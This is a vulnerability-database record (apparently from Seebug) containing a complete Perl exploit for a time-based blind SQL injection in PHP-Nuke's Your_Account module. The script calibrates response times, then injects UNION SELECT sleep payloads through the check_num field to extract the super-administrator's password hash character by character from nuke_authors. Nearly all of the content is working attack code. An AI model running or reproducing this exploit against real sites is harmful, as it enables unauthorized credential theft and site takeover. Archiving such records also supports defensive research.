{"href": "https://www.seebug.org/vuldb/ssvid-69359", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69359", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n # PHP-Nuke &#60;= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)\r\n# Author: yawn\r\n# Contact Me: http://www.unitx.net\r\n# Requirements: magic_quotes_gpc : off\r\n# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net | Dante90\r\n\r\n#\tYou will remember, Watson, how the dreadful business of the\r\n# Abernetty family was first brought to my notice by the depth which the\r\n# parsley had sunk into the butter upon a hot day.\r\n#\t\t -- Sherlock Holmes\r\n\r\nuse strict;\r\nuse warnings;\r\nuse LWP::UserAgent;\r\n\r\nsub Nuke::Bench {\r\n\tmy $hosto = $_;\r\n my $website = LWP::UserAgent-&#62;new;\r\n my $average = 0;\r\n print &#34;[+] Calculating average load time (may take a while) ...\\n&#34;;\r\n for (my $i = 0; $i &#60; 5 ; $i++) {\r\n my $bef = time();\r\n my $out = $website-&#62;get($hosto);\r\n my $time = time();\r\n $average += int($time-$bef);\r\n }\r\n return $average/5;\r\n}\r\n\r\nsub Nuke::Usage() {\r\n print &#34;[+] Usage: perl nuke.pl &#60;host&#62;\\n&#34;;\r\n print &#34;[+] the host must be the complete path to modules.php\\n&#34;;\r\n print &#34;[+] Example: perl nuke.pl http://www.site.com/modules.php\\n&#34;; \r\n}\r\n\r\nsub Nuke::Banner() {\r\n print &#34;[+] Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.1.0.3.5b\\n&#34;;\r\n print &#34;[+] I&#39;m not responsable for an illegal use of this exploit\\n&#34;;\r\n print &#34;[+] Date: 06-02-2010\\n&#34;;\r\n print &#34;[+] Author: yawn\\n&#34;;\r\n}\r\nNuke::Banner();\r\nmy $host = shift || die Nuke::Usage();\r\n$host .= &#34;?name=Your_Account&op=activate&username=WTF&#34;;\r\nmy $time = Nuke::Bench($host);\r\nmy $attack = LWP::UserAgent-&#62;new;\r\nmy $pass = &#34;&#34;;\r\n$attack-&#62;agent(&#39;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9&#39;);\r\nmy @charset = (48..57, 97..102); \r\nprint &#34;[+] Average load time is $time\\n&#34;;\r\nprint &#34;[+] Trying to exploit the SQL Injection\\n&#34;;\r\n\r\nfor (my $j = 1; $j &#60;=32; $j++) {\r\n\tsleep(3); # PHP-Nuke has a special anti-flood system\r\n\tforeach (@charset) {\r\n\t\tsleep(2);\r\n\t\tprint &#34;[+] Now trying with $_ \\n&#34;;\r\n\t\tmy $before = time();\r\n\t\tmy $resp = $attack-&#62;post($host,\r\n\t\t{ check_num =&#62; &#34;&#39;UNION/**/SELECT IF(SUBSTRING(pwd,$j,1) = CHAR($_),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper=&#39;1&#34; }, \r\n\t\tReferer =&#62; $host);\r\n\t\tmy $after = time();\r\n\t\tif(int($after-$before) &#62; ($time + 4)) {\r\n\t\t\tprint &#34;[+] Success with &#34;.chr($_).&#34;\\n&#34;;\r\n\t\t\t$pass .= chr($_);\r\n\t\t\tlast;\r\n\t\t}\r\n\t}\r\n}\r\nprint &#34;[+] MD5 Hash : $pass\\n&#34;;\r\n\r\n\r\n\n ", "id": "SSV:69359", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:09:49", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-11-19T17:09:49", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T17:09:49", "rev": 2}, "vulnersScore": -0.4}, "references": []}

{}